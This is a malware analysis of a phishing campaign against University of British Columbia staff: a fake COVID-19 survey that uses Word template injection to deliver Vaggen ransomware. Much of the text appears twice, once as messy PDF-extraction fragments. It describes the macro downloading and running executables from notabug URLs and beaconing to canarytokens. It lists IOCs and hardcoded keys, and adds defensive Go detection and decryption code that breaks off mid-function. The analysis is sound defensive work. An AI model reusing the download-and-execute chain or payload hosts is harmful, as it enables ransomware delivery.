r\nPage 2138 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2139 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2140 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2141 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2142 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2143 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2144 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2145 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2146 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2147 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2148 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2149 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2150 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2151 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2152 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2153 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2154 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2155 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2156 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2157 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2158 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2159 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from those previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly by email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much harder to detect spam sent through file sharing services without generating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
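The injection works because the lure .docx carries no macro of its own. Its word/_rels/settings.xml.rels part holds an attachedTemplate relationship with TargetMode="External"; Word fetches that .dotm when the document is opened and applies it, and only then does the template's macro reach the endpoint (still behind the usual macro-enablement prompt). Scanning the attachment for VBA therefore finds nothing; the check that does catch it is to look for external relationships inside the package. The Go program below is an added example, not code from the original post or from Malwarebytes: it builds a minimal .docx in memory with one ordinary external hyperlink and one remote attached template (the template URL is a constructed placeholder, not the real notabug.org path), scans every .rels part for external targets, and returns a verdict only for the attachedTemplate case.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// ExternalRef is one relationship inside a Word package whose target lies outside the file.
type ExternalRef struct {
	Part   string // the .rels part that declares it
	Type   string // last segment of the relationship type, e.g. attachedTemplate, hyperlink
	Target string
}

type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// FindExternalRels opens a .docx (a zip) and returns every relationship, in any
// .rels part, whose TargetMode is External. No macro scanning is involved: the
// lure document carries none, only the pointer that makes Word fetch one.
func FindExternalRels(docx []byte) ([]ExternalRef, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, err
	}
	var out []ExternalRef
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.EqualFold(r.TargetMode, "External") {
				typ := r.Type[strings.LastIndex(r.Type, "/")+1:]
				out = append(out, ExternalRef{Part: f.Name, Type: typ, Target: r.Target})
			}
		}
	}
	return out, nil
}

// IsTemplateInjection is the verdict: an external hyperlink is normal,
// an external attachedTemplate is the injection primitive.
func IsTemplateInjection(refs []ExternalRef) bool {
	for _, r := range refs {
		if r.Type == "attachedTemplate" {
			return true
		}
	}
	return false
}

// BuildSampleDocx constructs a minimal .docx in memory with one normal external
// hyperlink and one remote attached template. Constructed sample: the template
// URL is a placeholder supplied by the caller, not the real notabug.org path.
func BuildSampleDocx(templateURL string) []byte {
	const relNS = "http://schemas.openxmlformats.org/package/2006/relationships"
	const relType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
	parts := [][2]string{
		{"word/document.xml", `<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`},
		{"word/_rels/document.xml.rels", `<?xml version="1.0"?><Relationships xmlns="` + relNS + `"><Relationship Id="rId1" Type="` + relType + `hyperlink" Target="https://example.org/" TargetMode="External"/></Relationships>`},
		{"word/_rels/settings.xml.rels", `<?xml version="1.0"?><Relationships xmlns="` + relNS + `"><Relationship Id="rId1" Type="` + relType + `attachedTemplate" Target="` + templateURL + `" TargetMode="External"/></Relationships>`},
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for _, p := range parts {
		w, err := zw.Create(p[0])
		if err != nil {
			panic(err)
		}
		io.WriteString(w, p[1])
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	refs, err := FindExternalRels(BuildSampleDocx("https://example.invalid/raw/master/template.dotm"))
	if err != nil {
		panic(err)
	}
	for _, r := range refs {
		fmt.Printf("%-32s %-16s %s\n", r.Part, r.Type, r.Target)
	}
	fmt.Println("template injection:", IsTemplateInjection(refs))
}
```

Run against a real attachment, the same FindExternalRels call on the file's bytes lists every outbound pointer; the hyperlink line in the sample is there to show why the verdict keys on the relationship type rather than on "external" alone.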
The remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to determine whether the launch succeeded (the return value is the task ID of the executed application)
If successful, sends a GET HTTP request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn't successful, sends a GET HTTP request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.

This can be very useful as an early warning that an intruder has gained access to a network.
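Each step of that chain leaves a trace in ordinary endpoint telemetry: the Word process writing executables under %APPDATA%, Word launching a file it has just written, and Word issuing an HTTP request to canarytokens.com. The Go program below is an added example, not code from the original post: it runs a small correlation over a handful of constructed Sysmon-style events (the user name, Office install path and the benign noise entries are made up; the Byxor folder, the Polisen.exe and Killar.exe names and the canary host come from the analysis above) and returns one finding per step, in the order the macro performs them. Real telemetry would need the same logic keyed by host and process ID, which is left out here.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is a minimal endpoint-telemetry record (Sysmon-style, simplified).
// Kind is "file" (Image wrote Target), "process" (Image spawned Target) or
// "net" (Image connected to the host named in Target).
type Event struct {
	Kind   string
	Image  string
	Target string
}

var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}

// Hosts the macro contacts: the canary beacon and the payload host from the analysis.
var suspiciousHosts = map[string]bool{"canarytokens.com": true, "notabug.org": true}

func baseName(p string) string {
	p = strings.ReplaceAll(p, "/", `\`)
	return strings.ToLower(p[strings.LastIndex(p, `\`)+1:])
}

func droppedExecutable(p string) bool {
	l := strings.ToLower(p)
	return strings.Contains(l, `\appdata\roaming\`) && strings.HasSuffix(l, ".exe")
}

// DetectMacroDropper returns one finding per suspicious step performed by an
// Office process: writing an executable under %APPDATA%, launching a file it
// wrote earlier in the stream, and contacting a beacon or payload host.
func DetectMacroDropper(events []Event) []string {
	var findings []string
	dropped := map[string]bool{} // lower-cased paths of executables an Office app wrote
	for _, e := range events {
		if !officeApps[baseName(e.Image)] {
			continue
		}
		switch e.Kind {
		case "file":
			if droppedExecutable(e.Target) {
				dropped[strings.ToLower(e.Target)] = true
				findings = append(findings, "office app wrote executable: "+e.Target)
			}
		case "process":
			if dropped[strings.ToLower(e.Target)] {
				findings = append(findings, "office app launched its own drop: "+e.Target)
			}
		case "net":
			if suspiciousHosts[strings.ToLower(e.Target)] {
				findings = append(findings, "office app contacted "+e.Target)
			}
		}
	}
	return findings
}

// SampleEvents is a constructed stream modelled on the macro steps above; the
// user name, Office path and the two noise entries are placeholders, not UBC telemetry.
func SampleEvents() []Event {
	word := `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`
	return []Event{
		{"file", word, `C:\Users\staff\AppData\Roaming\Byxor\Polisen.exe`},
		{"file", word, `C:\Users\staff\AppData\Roaming\Byxor\Killar.exe`},
		{"process", word, `C:\Users\staff\AppData\Roaming\Byxor\Killar.exe`},
		{"net", word, "canarytokens.com"},
		{"file", `C:\Windows\explorer.exe`, `C:\Users\staff\AppData\Roaming\Byxor\notes.txt`}, // benign noise
		{"net", word, "example.org"},                                                          // benign noise
	}
}

func main() {
	for _, f := range DetectMacroDropper(SampleEvents()) {
		fmt.Println(f)
	}
}
```

The "launched its own drop" finding is the one worth paging on: an Office application executing a binary it wrote moments earlier is rare in legitimate use, whereas a lone request to canarytokens.com could also be a defender's own token firing.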
In this campaign, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware, such as the content of the ransom note, are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
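To pull the protected strings out of a sample, an analyst reverses the two layers described above: Base64-decode, then XXTEA-decrypt with "STALKER". The Go program below is an added example, not code from the post or from the xxtea-go library: it implements standard XXTEA together with the byte framing I understand xxtea-go to use (little-endian 32-bit words, the plaintext byte length stored in a trailing word, short keys zero-padded to 16 bytes, standard Base64 alphabet; all of that is an assumption to verify against the sample before trusting the output), and round-trips a constructed string, not the real note. The trailing length word doubles as a sanity check: with the wrong key the decrypted length is almost never in range, so the function returns an error instead of garbage.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
)

const xxteaDelta uint32 = 0x9E3779B9

// Standard XXTEA (Wheeler and Needham) mixing term.
func xxteaMX(sum, y, z, p, e uint32, k []uint32) uint32 {
	return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
}

// Both routines work in place; inputs shorter than two words are left unchanged, as in xxtea-go.
func xxteaEncryptWords(v, k []uint32) {
	n := uint32(len(v))
	if n < 2 {
		return
	}
	rounds, sum, z := 6+52/n, uint32(0), v[n-1]
	for ; rounds > 0; rounds-- {
		sum += xxteaDelta
		e := (sum >> 2) & 3
		for p := uint32(0); p < n-1; p++ {
			v[p] += xxteaMX(sum, v[p+1], z, p, e, k)
			z = v[p]
		}
		v[n-1] += xxteaMX(sum, v[0], z, n-1, e, k)
		z = v[n-1]
	}
}

func xxteaDecryptWords(v, k []uint32) {
	n := uint32(len(v))
	if n < 2 {
		return
	}
	rounds := 6 + 52/n
	sum, y := rounds*xxteaDelta, v[0]
	for ; rounds > 0; rounds-- {
		e := (sum >> 2) & 3
		for p := n - 1; p > 0; p-- {
			v[p] -= xxteaMX(sum, y, v[p-1], p, e, k)
			y = v[p]
		}
		v[0] -= xxteaMX(sum, y, v[n-1], 0, e, k)
		y = v[0]
		sum -= xxteaDelta
	}
}

// Little-endian word packing with the byte length in a trailing word (my reading of
// xxtea-go's framing; an assumption). That length word is what exposes a wrong key below.
func bytesToWords(b []byte, withLen bool) []uint32 {
	w := make([]uint32, (len(b)+3)/4, (len(b)+3)/4+1)
	for i, c := range b {
		w[i/4] |= uint32(c) << (8 * uint(i%4))
	}
	if withLen {
		w = append(w, uint32(len(b)))
	}
	return w
}

func wordsToBytes(w []uint32, withLen bool) ([]byte, error) {
	n := 4 * len(w)
	if withLen {
		m := int(w[len(w)-1])
		if m < n-7 || m > n-4 {
			return nil, errors.New("length word out of range: wrong key or corrupt data")
		}
		n = m
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = byte(w[i/4] >> (8 * uint(i%4)))
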